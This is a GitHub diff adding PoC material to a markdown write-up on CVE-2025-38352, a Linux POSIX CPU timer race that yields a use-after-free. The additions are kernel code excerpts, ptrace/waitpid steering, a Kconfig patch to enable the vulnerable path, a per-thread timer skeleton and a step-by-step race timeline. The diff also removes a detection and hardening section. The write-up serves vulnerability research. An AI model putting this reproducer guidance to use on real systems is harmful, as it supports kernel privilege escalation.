You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
+123-4Lines changed: 123 additions & 4 deletions
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -80,6 +80,9 @@ Two expiry-processing modes
80
80
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
81
81
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context
Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
130
140
Preconditions
131
141
- CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
@@ -139,6 +149,52 @@ Sequence
139
149
4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
140
150
5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and thus skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if not firing, corrupting state while expiry is being handled, leading to crashes/UB.
141
151
152
+
### How release_task() and timer_delete() free firing timers
153
+
Even after handle_posix_cpu_timers() has taken the timer off the task list, a ptraced zombie can still be reaped. The waitpid() stack drives release_task() → __exit_signal(), which tears down sighand and the signal queues while another CPU is still holding pointers to the timer object:
tsk->sighand = NULL; // makes future lock_task_sighand() fail
161
+
unlock_task_sighand(tsk, NULL);
162
+
}
163
+
```
164
+
165
+
With sighand detached, timer_delete() still returns success because posix_cpu_timer_del() leaves `ret = 0` when locking fails, so the syscall proceeds to free the object via RCU:
166
+
167
+
```c
168
+
static int posix_cpu_timer_del(struct k_itimer *timer)
Because the slab object is RCU-freed while IRQ context still walks the `firing` list, reuse of the timer cache becomes a UAF primitive.
188
+
189
+
### Steering reaping with ptrace + waitpid
190
+
The easiest way to keep a zombie around without it being auto-reaped is to ptrace a non-leader worker thread. exit_notify() first sets `exit_state = EXIT_ZOMBIE` and only transitions to EXIT_DEAD if `autoreap` is true. For ptraced threads, `autoreap = do_notify_parent()` remains false as long as SIGCHLD is not ignored, so release_task() only runs when the parent explicitly calls waitpid():
191
+
192
+
- Use pthread_create() inside the tracee so the victim is not the thread-group leader (wait_task_zombie() handles ptraced non-leaders).
193
+
- Parent issues `ptrace(PTRACE_ATTACH, tid)` and later `waitpid(tid, __WALL)` to drive do_wait_pid() → wait_task_zombie() → release_task().
194
+
- Pipes or shared memory convey the exact TID to the parent so the correct worker is reaped on demand.
195
+
196
+
This choreography guarantees a window where handle_posix_cpu_timers() can still reference `tsk->sighand`, while a subsequent waitpid() tears it down and allows timer_delete() to reclaim the same k_itimer object.
197
+
142
198
Why TASK_WORK mode is safe by design
143
199
- With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.
144
200
- Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.
@@ -159,7 +215,18 @@ Impact
159
215
160
216
Triggering the bug (safe, reproducible conditions)
161
217
Build/config
162
-
- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix.
218
+
- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch `kernel/time/Kconfig` to expose a manual toggle:
219
+
220
+
```c
221
+
config POSIX_CPU_TIMERS_TASK_WORK
222
+
bool"CVE-2025-38352: POSIX CPU timers task_work toggle"if EXPERT
223
+
depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
224
+
default y
225
+
```
226
+
227
+
This mirrors what Android vendors did for analysis builds; upstream x86_64 and arm64 force HAVE_POSIX_CPU_TIMERS_TASK_WORK=y, so the vulnerable IRQ path mainly exists on 32-bit Android kernels where the option is compiled out.
228
+
229
+
- Run on a multi-core VM (e.g., QEMU `-smp cores=4`) so parent, child main, and worker threads can stay pinned to dedicated CPUs.
163
230
164
231
Runtime strategy
165
232
- Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
@@ -191,9 +258,58 @@ void *deleter(void *arg) {
191
258
192
259
- Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() skips noticing firing due to failing task lookup/locking right after unlock_task_sighand().
193
260
194
-
Detection and hardening
195
-
- Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
196
-
- Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.
261
+
### Practical PoC orchestration
262
+
#### Thread & IPC choreography
263
+
A reliable reproducer forks into a ptracing parent and a child that spawns the vulnerable worker thread. Two pipes (`c2p`, `p2c`) deliver the worker TID and gate each phase, while a `pthread_barrier_t` prevents the worker from arming its timer until the parent has attached. Each process or thread is pinned with `sched_setaffinity()` (e.g., parent on CPU1, child main on CPU0, worker on CPU2) to minimize scheduler noise and keep the race reproducible.
264
+
265
+
#### Timer calibration with CLOCK_THREAD_CPUTIME_ID
266
+
The worker arms a per-thread CPU timer so that only its own CPU consumption advances the deadline. A tunable `wait_time` (default ≈250 µs of CPU time) plus a bounded busy loop ensure that `exit_notify()` sets `EXIT_ZOMBIE` while the timer is just about to fire:
267
+
268
+
<details>
269
+
<summary>Minimal per-thread CPU timer skeleton</summary>
270
+
271
+
```c
272
+
statictimer_t timer;
273
+
staticlong wait_time = 250000; // nanoseconds of CPU time
pthread_barrier_wait(&barrier); // released by child main after ptrace attach
291
+
timer_settime(timer, 0, &ts, NULL);
292
+
293
+
for (volatile int i = 0; i < 1000000; i++); // burn CPU before exiting
294
+
return NULL; // do_exit() keeps burning CPU
295
+
}
296
+
```
297
+
298
+
</details>
299
+
300
+
#### Race timeline
301
+
1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.
302
+
2. Parent `PTRACE_ATTACH`es, waits in `waitpid(__WALL)`, then `PTRACE_CONT` to let the worker run and exit.
303
+
3. When heuristics (or manual operator input) suggest the timer was collected into the IRQ-side `firing` list, the parent executes `waitpid(tid, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
304
+
4. Parent signals the child over `p2c` so child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` until the timer’s RCU callback completes.
305
+
5. IRQ context eventually resumes `handle_posix_cpu_timers()` and dereferences the freed `struct k_itimer`, tripping KASAN or WARN_ON()s.
306
+
307
+
#### Optional kernel instrumentation
308
+
For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cpu_timers() when `tsk->comm == "SLOWME"` widens the window so the above choreography almost always wins the race. The same PoC also renames threads (`prctl(PR_SET_NAME, ...)`) so kernel logs and breakpoints confirm the expected worker is being reaped.
309
+
310
+
### Instrumentation cues during exploitation
311
+
- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits.
312
+
- KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log WARN_ON_ONCE() from send_sigqueue() when the race lands, giving a quick success indicator.
0 commit comments